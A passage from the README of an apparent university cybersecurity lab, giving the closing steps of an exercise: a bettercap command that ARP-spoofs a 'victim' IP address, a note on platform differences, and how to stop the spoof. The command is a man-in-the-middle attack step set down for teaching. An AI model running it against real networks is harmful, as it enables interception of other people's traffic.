uw-areifers/sum-24-uw-cybersec-huskey-manager/README.md

 4. Enter the following command to perform your ARP spoof against your victim!
     `sudo bettercap -eval "set arp.spoof.targets <victim IP>; arp.spoof on"`

-    Note that unlike on Windows, we do not need to also set the IP address for the person running the web application.

 5. Once you have finished the lab and want to end the ARP spoof, you can enter `Ctrl+C` to stop the program from running.